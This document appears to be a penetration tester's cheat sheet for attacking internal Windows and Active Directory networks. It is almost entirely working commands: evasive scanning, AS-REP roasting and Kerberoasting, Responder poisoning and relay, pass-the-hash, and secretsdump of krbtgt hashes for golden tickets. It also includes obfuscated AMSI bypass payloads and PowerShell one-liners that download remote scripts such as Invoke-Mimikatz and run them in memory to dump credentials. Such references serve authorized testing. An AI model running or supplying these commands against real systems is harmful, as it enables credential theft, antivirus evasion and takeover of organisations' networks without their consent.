Internal Pentest

Search…
Internal Pentest
Scan
Host && Port Scanning
-n flag to decrease time avoiding DNS resoltion.
-f fragment packets as FW evasion, if no FW/IDS, remove it.
Also check FW evasion​
1
# Ping discovery, Top 20, fragment packets, no DNS resolution
2
sudo nmap -v --top-ports 20 X.X.X.0/24 -f -n --open -oA
3
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
4
sudo nmap -v --top-ports 200 X.X.X.0/24 -f -n -sV --open -oA
5
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
6
sudo nmap -v --top-ports 1000 X.X.X.0/24 -f -n -sV -Pn --open -oA
Copied!
Web detection
1
# httpx
2
cat ip.txt | httpx -silent -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx.txt
3
cat ip.txt | httpx -silent -ports <UNCOMMON.PORTS> -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx_uncommon.txt
Copied!
Enum
Check AD section too
Must-read:
​wadcoms.github.io​
​adsecurity.org​
​casvancooten AD cheatsheet​
​zer1t0 Attack AD​
​integration-IT AD cheatsheet​
AD no credentials
1
# Detect SMB on network
2
responder-RunFinger -i X.X.X.0/24
3
​
4
# Find DC
5
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
6
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'
7
​
8
# Enumerate DC
9
ldapsearch -h <DC.IP> -x -s base namingcontexts
10
​
11
# Check for null session, if got users go for ASREPRoast with GetNPUsers
12
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"
13
​
14
# Get hashes with no krb preauth
15
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
16
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10
17
​
18
# Get domain name
19
crackmapexec smb 10.10.10.10
20
smbmap -H 10.10.10.10 -u '' -p ''
21
​
22
# Get Users List
23
GetADUsers.py DC.local/ -dc-ip 10.10.10.10 -debug
24
​
25
# Get Users from ldap
26
windapsearch -U — full — dc-ip 10.10.10.10
27
​
28
# Get base domain
29
ldapsearch -x -h 10.10.10.175 -s base namingcontexts
30
​
31
# Get more info from DC
32
ldapsearch -x -h 10.10.10.10 -b ‘DC=DCNAME,DC=LOCAL’
Copied!
AD with credentials
Enum AD AIO
1
# https://github.com/CasperGN/ActiveDirectoryEnumeration
2
python3 -m ade --dc <domain.name> -u <[email protected]> --help
3
# https://github.com/adrecon/ADRecon from Windows on Domain
4
​
Copied!
windapsearch
1
# https://github.com/ropnop/go-windapsearch
2
windapsearch -d <domain>.<name> -u <user> -p <password> --help
Copied!
ldap
1
# Domain users
2
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt
3
​
4
# Domain computers
5
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt
6
​
7
# Domain groups
8
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt
Copied!
rpcclient
1
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdom
2
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomains
3
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusers
4
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroups
5
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c getdompwinfo
Copied!
cme
1
# Run commands
2
​
3
# PS
4
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
5
# CMD
6
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
7
# PTH
8
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
9
# Other methods
10
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}
11
​
12
# Dumps
13
​
14
# SAM
15
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
16
# LSASS
17
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
18
# Sessions
19
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
20
# Logged users
21
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
22
# Disks
23
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
24
# Users
25
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users
26
# Groups
27
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
28
# Local groups
29
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
30
# Password policy
31
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol
Copied!
Attacks
LLMNR & NBT-NS Poisoning (Responder)
Find a privileged user creds to reuse in other host
Set to Off SMB and HTTP in /usr/share/responder/Responder.conf
1
responder -I ppp0 -A                # Only listen
2
responder -I ppp0 -rv exec bash     # Poison
Copied!
MultiRealy reuses hashes captured in specific host while responder is running
1
MultiRelay.py -t X.X.X.X -u ALL
Copied!
Kerberos
​Cheatsheet​
1
# Kerberoasting (hashcat 13100)
2
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100
3
​
4
# BF
5
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
6
​
7
# ASREPRoast (hashcat 18200)
8
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
9
​
10
# PTH/PTK
11
# Request ticket
12
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
13
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
14
getTGT.py <domain_name>/<user_name>:[password]
15
# Set ticket
16
export KRB5CCNAME=<TGT_ccache_file>
17
# Use it
18
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
19
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 [email protected]
20
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
21
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
Dumps
1
# User hash
2
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user user1
3
​
4
# krbtgt hash dump -> Golden Ticket
5
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user krbtgt
Copied!
AMSI Bypass
1
# Basic
2
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
3
​
4
# Obfuscation
5
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
6
​
7
# Other bypass
8
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
Copied!
Common Exploits
​ZeroLogon​
EternalBlue: use auxiliary/scanner/smb/smb_ms17_010
​PrivExchange​
​SMBGhost and SMBleed​
PrivEsc
Local Privilege Escalation
1
# Juicy Potato - Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
2
# Works only until Windows Server 2016 and Windows 10 until patch 1803
3
https://github.com/ohpe/juicy-potato
4
https://github.com/TsukiCTF/Lovely-Potato
5
​
6
# PrintSpoofer Exploit the PrinterBug for System Impersonation
7
# Works for Windows Server 2019 and Windows 10
8
https://github.com/itm4n/PrintSpoofer
9
​
10
# RoguePotato from Service Account to System
11
# Works for Windows Server 2019 and Windows 10
12
https://github.com/antonioCoco/RoguePotato
13
​
14
# Abusing Token Privileges
15
# https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
16
​
17
# SMBGhost CVE-2020–0796
18
https://github.com/danigargu/CVE-2020-0796
19
​
20
# CVE-2021–36934 (HiveNightmare/SeriousSAM)
21
https://github.com/cube0x0/CVE-2021-36934
Copied!
Extra
Oneliners
1
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
2
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
3
​
4
# Invoke-Mimikatz: Dump credentials from memory
5
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
6
​
7
# Import Mimikatz Module to run further commands
8
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
9
​
10
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
11
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
12
​
13
# PowerUp: Privilege escalation checks
14
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
15
​
16
# Invoke-Inveigh and log output to file
17
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
18
​
19
# Invoke-Kerberoast and provide Hashcat compatible hashes
20
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
21
​
22
# Invoke-ShareFinder and print output to file
23
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
24
​
25
# Import PowerView Module to run further commands
26
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
27
​
28
# Invoke-Bloodhound
29
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
30
​
31
# Find GPP Passwords in SYSVOL
32
findstr /S cpassword $env:logonserver\sysvol*.xml findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
33
​
34
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
35
runas /user:DOMAIN\USER /noprofile powershell.exe
36
​
37
# Insert reg key to enable Wdigest on newer versions of Windows (restart needed)
38
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
Copied!
Native commands
1
# User Domain
2
$env:USERDNSDOMAIN
3
(Get-ADDomain).DNSRoot
4
​
5
# User Domain info
6
Get-ADUser Anakin
7
​
8
# Computer Domain
9
(Get-WmiObject Win32_ComputerSystem).Domain
10
​
11
# DNS, NetBIOSName, DomainSID
12
Get-ADDomain | select DNSRoot,NetBIOSName,DomainSID
13
​
14
# Trusted domains
15
nltest /domain_trusts
16
​
17
# Forest info
18
Get-ADForest
19
​
20
# Interesting users
21
Get-ADUser -Filter * | select SamAccountName
22
​
23
# Computer accounts
24
Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName
25
​
26
# Trust accounts
27
Get-ADUser  -LDAPFilter "(SamAccountName=*$)" | select SamAccountName
28
​
29
# Groups
30
Get-ADGroup -Filter * | select SamAccountName
31
​
32
# Interesting groups
33
Get-ADGroup "Domain Admins" -Properties members,memberof
34
​
35
# Get DC names
36
nltest /dclist:<domain.name>
37
​
38
# Get all users in the current domain
39
Get-NetUser | select -ExpandProperty cn
40
​
41
# Get all computers in the current domain
42
Get-NetComputer
43
​
44
# Get all domains in current forest
45
Get-NetForestDomain
46
​
47
# Get domain/forest trusts
48
Get-NetDomainTrust
49
Get-NetForestTrust
50
​
51
# Get information for the DA group
52
Get-NetGroup -GroupName "Domain Admins"
53
​
54
# Find members of the DA group
55
Get-NetGroupMember -GroupName "Domain Admins" | select -ExpandProperty membername
56
​
57
# Find interesting shares in the domain, ignore default shares
58
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
59
​
60
# Get OUs for current domain
61
Get-NetOU -FullData
62
​
63
# Get computers in an OU
64
# %{} is a looping statement
65
Get-NetOU -OUName StudentMachines | %{Get-NetComputer -ADSPath $_}
66
​
67
# Get GPOs applied to a specific OU
68
Get-NetOU *student* | select gplink
69
Get-NetGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"
70
​
71
# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
72
Get-NetGPOGroup
73
​
74
# Get incoming ACL for a specific object
75
Get-ObjectACL -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights
76
​
77
# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
78
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft
79
​
80
# Get interesting outgoing ACLs for a specific user or group
81
# ?{} is a filter statement
82
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights
83
​
84
# Get Applocker Policy
85
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
86
​
87
# Get computers running LAPS, along with their passwords if we're allowed to read those
88
Get-LAPSComputers
89
​
90
# Get groups allowed to read LAPS passwords
91
Find-LAPSDelegatedGroups
Copied!